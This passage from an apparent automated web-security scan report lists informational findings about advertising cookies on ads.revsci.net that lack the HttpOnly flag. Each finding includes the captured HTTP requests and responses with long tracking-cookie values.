#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`S2!!!!$<xqZB!#`U0!
!!!#<xqZB!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!#<xqZB!#a=7!!!!#<xqZB!#a=9!!!!#<xqZB!#a=P!!!!#<xqZB!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG+!!!!#<xqZB!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!$<xqZB!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!$<xqZB!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q"; path=/; expires=Wed, 08-May-2013 01:01:03 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 01:01:03 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

13.25. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305609&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_0QhP="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"; 
rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+Tw3jzv8rD7yvDmvWDQ0Q8aZIAiDGSo49tlyo/qaXH5wQBQZoGx8vtub+wYEktHO6BM7/uLrdNXC7XGW2RoRccmRQldIeS8HXSTpZFxLggkcDjvNYOoGY5VZbYTnh36BiBOSmypBu+2iq2QDXMLkcK2uHT/C8yL+QzA9VXQB66zprk8rmpiNuQ+aVh/A47qdJNDn8qjknSHNRViyA6Lf9VLCsOvSBW/nO5bs5zsYbyjNLDs0tlY72ojd62XiPpxCcc3uKexC5DTRnhh3dyjVxPGSKlTmvlnr9aGHKHTLVK+Pbf8ptc5PMhhlo0YzcsATzNxrLbRoT3O3q8ARpCvgM02ra6StjkCMXHMHSO08i3XfCPZLjNdRaZogP3Ujafe16GMiz7s91qA4p5CB/lHJr+0KppLU7y9WBhmEa47Ru+ljaZ072rhbhEcmxw9qqLNU/Qhz9Jcu1BKQ80Yxf197S1IJ5HEjQj4x8ot9dp6PtQCbnIte0dkNtJgvyKbqABW/4Y9BTvL9lB5N3cnK0q0eAm7RmvrQsA06FWH3VQOB9HtLNz/xTbZK7hCVXAebPf6jRXHD0nkXRlRjiWS6ey6ODk7jWoiqPWwr+x2FHdnLpzowfuBuaZPFbrr5//T+tJPg0eKuCLr3R4K6PTUqHpej1AArZPQTL6FLqPQT4jVC3KzTCEGa4CaAnHY0Zrqs3d5iDVBUqwlTDxNfC7Ga9LeLy7/TcjcspKJyoaFh/2WC0jsAA3fEz6gj7U8mHA9cZFqj1IA6CoHNofMMWxvZ1EP/MiaMCqu1NxvqRz/nXou9NXXRguDHgUMu+z/yqY7XVxJWePCdb1p/q0Ew6qECQtyV6d8GNEFQloez/xBOOBcaKVasrabhh1mQhT1NABEEl0kGwHC9WuwvD8k5Ecm2g8Ub+8b8xWwawUkMxMLByw5fcEsO9lfN6yIXoK1vxbj/pN0GepXRxh4CCs9Y7SE/BWKnzNyBxrgIJBjNX2fpVDk9Qsy0jVeGn3pOqTP3l4YuJ1ioOHQT1JoRoJIKV4KRQq6Uzfq06fBDaJQf2kAQmgasQb39TGpsoAAZ5fvxckeQEMeOXTASaI1R/+6s3NCrVMLC7QIoUNHB/pGHS/OcquP8g8+avfDQBV+QwQIEjhL6Iy4vOheGZSgcslcOuTo9uMDkQcD4TrVKgsZIcfxEvv59B9klF63vqdAxxVxWmQS/tta5XA0ec/K359cVqOUV61/1Z4ODlvwuT29lxjH3/Y2sHLLMADwAXCR12/hlj15BfplbSqflcwddB3qetl5l4Zp7Z85bCzMG3I2xqoeKfJnKV+bExcZUxDS3oaeHUpFHUs4N5ehhFRt110WtEiM3U8HX32Gj4Hp80Y48x4dEhHIyopb6KyUupuEWF0HYN10tmN/yOvbv3JznYqmx7xBf5dbh1P1aFX/I703GMAJL4bJnpHiTF000ztP6EaHxQuNUeUotUExw=="; rsi_segs_1000000=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; rtc_M6m_=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0QhP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0QhP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_KnyU="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 01:13:48 GMT

GIF89a.............!.......,...........D..;

13.26. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=4298BE5B089CBB1E55E7A69A4E062327&rsi_site=BCE6C348CDB3347A37A6E9503B9F4896&rsi_event=3E8A9FCC69C70348C54F8308F5EEBF2B HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&browse_products=91637&fb_key=undefined%20Fields%20of%20Europe%20for%20Spring
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw
+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_0s-X=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; rsiPus_8M_3="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"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8M_3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8M_3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_T3XK="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=987677&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:09:50 GMT


13.27. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305608&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; 
rsiPus_8M_3="MLsXrqMOJjhv5pB0GuK8L0HP6TxvTFfsq5kDvElXUq9TwKhTQq2Ubnlep6FA0C8r6htCP2PSMq515hwVRH+xujb+G1htaTXszdeYeilTKKO1RBpCQ0t0e2bIMKUlM6bClRwGcxa+rMOmPp+zucy3NXWBXF98hg0FKNucuRxIwwaBqYDZc6gnhLN9X4uRT1JhPmDtba7wb1Ny0LW1ZiGWsLWEcpgifGwVEE5eaMuOG08OuIdls6ej9CGChzNgtGsTz2fAmDRoIO7NRmVGO2Fu0NmIJaCq7dRuHscaTiC32VFYaA+rHHFt2+c5dlmsE3GVMKlrsnqqSWAF0XEbT2iXL29pLdhi4J90vyDRyP5v7MXOQ2SnexhjoTI5feC3ziZujOSKbuHw0UZzk0vKfGo2UI5kqXNXbmSsPn/zT4VYlQl3qI1tr+mET3Lk9JcNnCeolcuo4nIUc2MVAWhQju5cRXdKnK346bdbLyeu8iNlZNnzOXbRFRhJZ76I+GGWQpAXJN3wVH7fm4hpae41QS4ebXx2GAiSPiFanMRGgxk1KKyk1R9inDRhNoP+NEFnk4QCIn0xHXRkmHQxFNYR16es6aFmKW0aXwrfjh/SleuLcnNVOtmkxOqqySqyGprAvdvjNPMG6OSZC+mmHMulB/MVrHv+J4VtHZPz4w/D7w00KwgJ9/gt0igYOwCqs7sTKGjscJmbv5uKi1CLBZ30Eert2NaeyUoIBxi2ZcULwt/pNT+BN4X/jzNpqtAsS2eWt+6k+t1yjORdslvobLE5uBgu+QoIj9KoAI/xn5tbSJNbh/pqDYFgbWX6rn8LBlqlhvNirM2Iac8nZobH2ruya7LtRtlAMmYS8q2hdLyVG/f3NGmzPJFmiflLeVXcvRJm9fM+C44nvTf3dth3bO0BRTJJRm1xoSl46U/Jt/klHQfgwwR9piSC4JNxvNN8mx9N0NDk5r1u1PzRR8T7hTV3g2qe8NSmVo7wBTml4xNMgbY+g8FGDaZ4l+tgQR7HDojsJ8vv5P8akjydW4FTJxg="; rsi_us_1000000="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"; rsi_segs_1000000=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; rtc_VOiH=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

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8M_3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8M_3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yRO_="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1147048&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=1044587&id=596291&id=1049772&id=1063911&id=1063910&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:09:55 GMT


13.28. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305608&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; 
rsiPus_nlnh="MLsXrqMOLjproBAxuuKo7xC/v0lmTlecDqSiToO8phWAnpO+YSTKFqU3TDxxVRk18Y3VCTjL0ah6bV8hWqwKPejoJrdpYW+maSaE+SE+JYHAqw/wQUT1qX7wDv68KC/ogKITsb9dC8gdu0uA7sN+LTYfo6fDEvy97fr0sfCIWg/dl5X5uzDg9KOQN8uVmwRirSVhkHVm0KyQbnTUGsc2ZQvcAhR0xzocc/zo82+gM1RCIH+HSCGErtUUZc9RJCGEmtyJa50VtG6uhU13oDsoWTBcH+pKwA+EFmS5nr9l5tca9Gn0G15id7IFw3BzD4Tvch7eJWmhiUjCLEDfLl0gbdj+ckvbdlfP3VayclAOz29lDjEAIM7evWDsxAp95So743zgvTRtdCe4oiCVigVSbNlYtf2gls9w4/Rbe+tmpqScTnQCnaNQwIizICQvruNgmFH/6+lojkVGlNDz5Ky3rTgx4Lb7FGgQFqtNmVDkIrLBzE5vX3eGdFDbFFVsTp88ZqFbUCErpL3v70oO0vaq8n4dLXBDnlJvcS6JdnjRk9xkIe69ZW1oeNhnpjXeiCaYl4LhoNHPSyKqNQcopy21Lq6Fx65Ehc1L/Zo9a+T+ilMYjIAgks58mh41keirnpuezj6yRhV7JX2rrCEqT/hJNxX7y2JcARkB1nMRRB8Zj9SHmrYZ638tSYG3b90lhgWBLXv0LDarrDfBS1eszRzd+qY471tll+fm92jvMhKTIDlOLkVopd2x+0aEKBYWNNN3k3toyRwrKsE4hBORWYMZSTdPaYPOQ1UPnovWcZpohcny7FCN8FH6hqZu6WJ0bE7KXD9+iEBSpnGNcjuJ57gNCQUER3dnilXxUU035Ub31YKYngAcRd67M4oL+VtrIgTE1ftBWaJU5hTHGEe4Nz2Zci3y3xXI6G85vV5OQZPwMjZ5we4k3N9bf3L5Db5oz9FeCksBpZVkBjxTqBRYGfoO/jdzHDYmpioDH7T49AzUBkFAhbVGacpYyYl5p0wOriiZcw3ZFQoSD4yzLpEu3nFozzx0"; rsi_us_1000000="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"; rsi_segs_1000000=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; rtc_dGQ8=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

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nlnh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nlnh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qnR8="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
